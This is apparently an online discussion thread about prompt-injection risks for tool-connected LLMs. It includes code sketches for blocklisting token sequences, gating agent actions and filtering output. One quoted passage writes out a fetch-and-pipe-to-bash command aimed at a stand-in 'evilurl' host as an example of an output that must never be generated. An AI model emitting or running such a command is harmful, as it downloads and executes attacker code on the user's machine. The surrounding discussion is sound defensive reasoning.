
I think this is a bigger issue than many imagine. If you think SQL injections are bad, imagine LLM injections where the LLM is connected to a system that can perform tasks such as emailing people.

Worse, mitigations for this are not at all obvious or guaranteed to work, thanks to the probabilistic nature of LLMs.

LLM injections are probably more insidious than Spectre: there are probably a great many non-obvious ways to inject that we have only begun discovering.



How quickly we forget pandas becoming gibbons. https://www.popsci.com/byzantine-science-deceiving-artificia... The speed at which we are giving LLMs access to previously-secured systems feels irresponsible, but there's no time to feel things! Progress never stops, and so on.


Your link is 404 for me.



I believe that, when dealing with these very large, general-purpose LLMs, there really is no practical way to protect against any 'injection' technique, short of preventing certain strings from ever being completed by the LLM, similar to what Andrej describes here (which is still not 100% reliable, unfortunately): https://colab.research.google.com/drive/1SiF0KZJp75rUeetKOWq...

*AI Safety:* What is safety viewed through the lens of GPTs as a Finite State Markov Chain? It is the elimination of all probability of transitioning to naughty states. E.g. states that end with the token sequence `[66, 6371, 532, 82, 3740, 1378, 23542, 6371, 13, 785, 14, 79, 675, 276, 13, 1477, 930, 27334]`. This sequence of tokens encodes for `curl -s https://evilurl.com/pwned.sh | bash`. In a larger environment where those tokens might end up getting executed in a Terminal that would be problematic. More generally you could imagine that some portion of the state space is "colored red" for undesirable states that we never want to transition to. There is a very large collection of these and they are hard to explicitly enumerate, so simple ways of one-off "blocking them" is not satisfying. The GPT model itself must know based on training data and the inductive bias of the Transformer that those states should be transitioned to with effectively 0% probability. And if the probability isn't sufficiently small (e.g. < 1e-100?), then in large enough deployments (which might have temperature > 0, and might not use `topp` / `topk` sampling hyperparameters that force clamp low probability transitions to exactly zero) you could imagine stumbling into them by chance.
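The "blocking" idea he mentions can be made concrete as logit masking in the sampling loop: whenever the generated tail matches the prefix of a blocklisted token sequence, clamp the final token's probability to zero. A minimal sketch (the token IDs and blocklist are illustrative, not from any real tokenizer), which also illustrates why one-off blocking doesn't scale to a large, hard-to-enumerate set of red states:

```python
import numpy as np

# Illustrative blocklist: token sequences we never want the model to emit.
# In practice this set is enormous and cannot be enumerated, which is
# exactly the point of the quoted passage.
BLOCKED_SEQUENCES = [
    [66, 6371, 532, 82],  # imagined prefix of a "curl -s ..." encoding
]

def mask_blocked_logits(logits, generated):
    """Return a copy of `logits` with -inf on any token that would
    complete a blocklisted sequence, given the tokens generated so far."""
    logits = logits.copy()
    for seq in BLOCKED_SEQUENCES:
        prefix, last = seq[:-1], seq[-1]
        # If the tail of what we've generated matches the blocked prefix,
        # forbid the final token (softmax(-inf) == exactly 0 probability).
        if generated[len(generated) - len(prefix):] == prefix:
            logits[last] = -np.inf
    return logits
```

Note that this only clamps exact sequences; a trivially rephrased payload (different URL, extra whitespace, base64) sails straight through, which is why the quoted passage calls such one-off blocking unsatisfying.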


The way I think about this is that we need to treat AIs as human employees that have a chance of going rogue, either because of hidden agendas or because they've been deceived. All the human security controls then apply: log and verify their actions, don't give them more privileges than necessary, rate limit their actions, etc.
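Those human-style controls can be sketched as a gate in front of an agent's side-effecting actions. The class and action names below are hypothetical, purely to illustrate logging, least privilege, and rate limiting together:

```python
import time
import logging
from collections import deque

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("agent-gate")

class ActionGate:
    """Least-privilege wrapper around an agent's side-effecting actions:
    every request is logged, checked against an allowlist, and rate-limited."""

    def __init__(self, allowed_actions, max_per_minute=5):
        self.allowed = set(allowed_actions)
        self.max_per_minute = max_per_minute
        self.recent = deque()  # timestamps of recently permitted actions

    def permit(self, action):
        now = time.monotonic()
        # Drop timestamps older than 60 seconds, then apply the rate limit.
        while self.recent and now - self.recent[0] > 60:
            self.recent.popleft()
        if action not in self.allowed:
            log.warning("denied (no privilege): %s", action)
            return False
        if len(self.recent) >= self.max_per_minute:
            log.warning("denied (rate limit): %s", action)
            return False
        self.recent.append(now)
        log.info("allowed: %s", action)
        return True
```

For example, an email-sending agent might get `ActionGate({"send_email"}, max_per_minute=2)`: a request to delete a database is refused outright, and a burst of emails is cut off after the second, leaving an audit trail either way.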

It's probably impossible to classify all possible bad actions in a 100% reliable manner, but we could get quite far. For example, detecting profanity could be as simple as filtering the output through a naive Bayes classifier. Everything that's left would then be a question of risk acceptance.
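A naive Bayes output filter of the kind suggested above fits in a few lines. This is a toy sketch: the training snippets are made up, it uses Laplace-smoothed unigram likelihoods, and it assumes roughly balanced classes (so the class prior is omitted):

```python
import math
from collections import Counter

# Toy, purely illustrative training data.
BAD = ["you absolute idiot", "what a stupid moron"]
OK = ["please review the attached report", "thanks for the quick reply"]

def train(docs):
    counts = Counter(w for d in docs for w in d.split())
    return counts, sum(counts.values())

bad_counts, bad_total = train(BAD)
ok_counts, ok_total = train(OK)
vocab = set(bad_counts) | set(ok_counts)

def log_likelihood(text, counts, total):
    # Laplace-smoothed unigram log-likelihood of the text under one class.
    return sum(
        math.log((counts[w] + 1) / (total + len(vocab)))
        for w in text.split()
    )

def looks_profane(text):
    # Classify by comparing likelihoods (equal priors assumed).
    return (log_likelihood(text, bad_counts, bad_total)
            > log_likelihood(text, ok_counts, ok_total))
```

Even this toy version shows the shape of the residual risk: anything the classifier misses is exactly the "risk acceptance" the parent comment describes.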


That's a good point; we can always filter the output externally, similar to SQL injection checking.



